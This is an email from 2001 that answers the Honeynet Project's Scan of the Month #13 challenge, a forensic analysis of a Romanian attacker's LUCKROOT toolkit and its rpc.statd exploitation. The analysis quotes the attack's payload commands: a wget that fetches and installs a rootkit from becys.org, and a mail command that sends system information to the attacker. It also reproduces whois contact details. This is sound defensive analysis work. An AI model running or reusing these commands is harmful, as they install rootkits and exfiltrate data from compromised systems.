From soul4blade@yahoo.com Sat Mar 17 19:44:12 2001
Date: Thu, 1 Mar 2001 04:21:47 -0800 (PST)
From: Bogdan Calin <soul4blade@yahoo.com>
To: project@honeynet.org
Subject: SCAN OF THE MONTH Answers

# SCAN OF THE MONTH #13:  March, 2001
# Challenge to see who can determine which tool was used 
# and the purpose of this attack.  
# The packets were captured from the wild as part of the 
# Honeynet Project, http://project.honeynet.org

In the past two months, the Honeynet Project has identified
a great deal of aggressive activity from members of the Romanian
blackhat community.  On 5 Jan, 2001 a Linux honeypot was 
compromised by one of these members.  On 8 Jan, 2001,  the attackers 
keystrokes were captured and forwarded to a secured syslog server.  
Your job is to analyze these keystrokes and the tool LUCKROOT.TAR.  
Based on your research, you should be prepared to answer the
questions 
set forth by the challenge.You can download LUCKROOT.TAR from the URL
below.  
WARNING: you will be analyzing a toolkit captured in the wild,
this tool set was created by the blackhat community for 
mailicious purposes.  Only use a system dedicated for such
analysis.  Do not run this toolset while connected to a network.
You have been warned :)  
http://project.honeynet.org/scans/scan13/LUCKROOT.TAR
 

QUESTIONS:
----------

### QUESTION 1: What is the blackhat attempting to do with his
command line syntax? 

First the blackhat is using lynx to download LUCKROOT.TAR from
www.becys.org, extracts  LUCKROOT.TAR (his toolkit) to
/usr/sbin/.mail directory.

Next is using the ./luckgo shell script to scan and possibly get root
on some rpc.statd  vulnerable computers.
Various networks have been probed (216.210.x.x, 200.120.x.x,
64.120.x.x, ...)

Details on rpc.statd vulnerability:  
(http://www.securityfocus.com/vdb/bottom.html?section=discussion&vid=1480)

### QUESTION 2:What does the tool accomplish? 

Scan and try to exploit rpc.statd vulnerable systems.

### QUESTION 3:How does the tool work? 

The tool contains the next files :

luckstatdx.c    - modified rpc.statd exploit 
luckstatdx      - compiled version of the above file
luckscan-a.c    - class A port scanner
luckscan-a      - compiled version of scanner
luckgo          - main shell script

"luckgo" first compiles "luckstatdx.c" and "luckscan-a.c"
Next it launch the scanner "luckscan-a" with parameters provided from
command line.
"luckscan-a" perform a port scanning for port 111 (rpc) and launch
"luckstatdx" exploit  against responsive systems.
When a vulnerable system is found the next commands are executed:
 
cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar
-zxvf xzibit.tar.gz; cd  lamerk; ./install; cd /; rm -rf lamerk
xzibit.tar.gz

Another toolkit is downloaded and installed.
(http://www.becys.org/xzibit.tar.gz)
"xzibit.tar.gz" it's a modified version of a well known rootkit. 
Contains "stealth" replacements for various unix commands
ifconfig,top,ps,netstat,... 

This toolkit install a ssh daemon on port 6969.

The toolkit has been modified so it will send an email to
becys@becys.org with subject  "becys rewting" 
>cat /tmp/info | mail -s "becys rewting" becys@becys.org 


### QUESTION 4:Is this tool a worm, or would you classify it as
something else? 

Is not a worm because it's not self propagating , it's just an
automatic tool.

### QUESTION 5:Is this tool original, or is it simply based on
previous tools? If based on 
previous tools, which ones and what is modified? 

It's based on rpc.statd exploit from ron1n 
(http://www.securityfocus.com/data/vulnerabilities/exploits/statdx.c)
"luckstatdx.c" is just a modified version of statdx.c.

Also has been modified the install script from the xzibit.tar.gz
rootkit.


### QUESTION 6:Bonus Question:
What information can you obtain about who is using or created the
tool? 

The people behind this tool :  "BeCyS & ReSpEkT".
Homepage : www.becys.org.

They are from Romanian community , next comment is using Romanian
language
"// Aici cred ca trebuie un exit." (luckstatdx.c)

Information provided by whois : (probably faked)
whois -h whois.crsnic.net becys.org

Redirecting to BULKREGISTER.COM, INC.

bSoft 
   1 Hensel Dr. Apt.#Z1F
   College Station, Texas 77840
   US

   Domain Name: BECYS.ORG

   Administrative Contact:
         Qian Wang    becys@yahoo.com
        bSoft
        1 Hensel Dr. Apt.#Z1F
        College Station, Texas 77840
        US
        Phone- (979)862-9233 
        Fax- 
   Technical Contact:
        Web Site Source, In  info@websitesource.com
        Web Site Source, Inc.
        2476 Bolsover, Suite 484
        Houston, TX 77005-2518
        US
        Phone- 713-667-2520 
        Fax- 800-863-6499

   Record updated on 2000-09-11 00:00:00.
   Record created on 2000-09-11.
   Record expires on 2002-09-11.
   Database last updated on 2001-02-28 23:45:44 EST.

   Domain servers in listed order:

   NS.WEBSITESOURCE.COM          216.147.43.135                
   NS2.WEBSITESOURCE.COM         216.147.1.116             

----------------------------------------------------------------
Bogdan Calin (soul4blade@yahoo.com)
come.to/soul4blade


__________________________________________________
Do You Yahoo!?
Get email at your own domain with Yahoo! Mail. 
http://personal.mail.yahoo.com/